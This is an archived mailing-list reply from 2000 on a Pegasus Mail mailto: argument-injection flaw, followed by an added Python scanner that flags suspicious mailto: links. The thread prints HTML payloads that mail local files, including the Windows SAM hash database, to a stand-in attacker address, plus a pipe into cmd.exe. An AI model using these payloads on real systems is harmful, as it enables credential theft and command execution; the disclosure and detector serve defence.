Subject: Re: Pegasus Mail
From: H D Moore (hdm@SECUREAUSTIN.COM)
Date: Mon Oct 02 2000 - 22:44:35 CDT
- Next message: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Previous message: Helmut Springer: "Re: Pegasus Mail"
- In reply to: Imran Ghory: "Pegasus Mail"
- Next in thread: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Reply: H D Moore: "Re: Pegasus Mail"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Imran Ghory wrote:
>
> When using the following html,
>
> <a href="mailto:hacker@hakersite.com -F c:\test.txt"> Click
> here</a>
>
> When the user clicks on "Click here" Pegasus mail will
> automatically creates a message which has a copy of the file
> "c:\test.txt" and is addressed to "hacker
hakersite.com" and
> queues it ready to be sent without any further user intervention.
>
> If instead of "hacker@hakersite.com" we have a local user,
> "hacker" the message won't be queued but just sent immediately.
>
> As inorder to have files stolen the user would have to click on the
> dubious looking link, is this security risk serious ?
YES, the user doesn't even need to click on the link though.
Imagine a page like:
<body onload="mailto:hacker@hakersite.com -F c:\winnt\repair\sam._">
There goes your user account/hash database. Have you tested to see what
pipes do?
Example:
<body onload="mailto:hacker@hakersite.com -F c:\winnt\repair\sam._ | cmd.exe /c echo I can any command I want">
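As an added defensive example (not part of this thread or of Pegasus Mail), a small scanner that pulls mailto: URIs out of any HTML attribute and flags the ones that carry command-line style switches, pipes, or a malformed address; the sample page is constructed from the links quoted above plus one benign link.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: the two mailto: strings from the thread plus a benign link.
SAMPLE_HTML = """
<a href="mailto:alice@example.com?subject=hi">ok</a>
<a href="mailto:hacker@hakersite.com -F c:\\test.txt">Click here</a>
<body onload="mailto:hacker@hakersite.com -F c:\\winnt\\repair\\sam._ | cmd.exe /c echo hi">
"""

# The address part of a mailto: URI (RFC 2368) is a bare address list. Whitespace,
# a dash-prefixed token or a pipe is never part of an address; if the URL handler
# passes the whole URI to the mail client's command line, such text becomes arguments.
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$")


def classify_mailto(uri):
    """Return a list of reasons a mailto: URI looks unsafe (empty list = clean)."""
    if not uri.lower().startswith("mailto:"):
        return ["not a mailto: URI"]
    body = uri[len("mailto:"):]
    addr_part = body.split("?", 1)[0]  # header fields after '?' are not addresses
    reasons = []
    if "|" in body:
        reasons.append("pipe character in URI")
    if re.search(r"\s-[A-Za-z]", body):
        reasons.append("command-line style switch")
    for addr in addr_part.split(","):
        if not ADDR_RE.match(addr.strip()):
            reasons.append("malformed address: %r" % addr.strip())
    return reasons


class MailtoCollector(HTMLParser):
    """Collect mailto: URIs from every attribute, not only href (onload counts too)."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and value.lstrip().lower().startswith("mailto:"):
                self.found.append((tag, name, value))


def scan_html(html):
    """Return [(tag, attribute, uri, reasons)] for each mailto: URI in the page."""
    parser = MailtoCollector()
    parser.feed(html)
    return [(t, a, u, classify_mailto(u)) for t, a, u in parser.found]
```

Run `scan_html(SAMPLE_HTML)` to see the benign link come back with no reasons and both quoted payloads flagged.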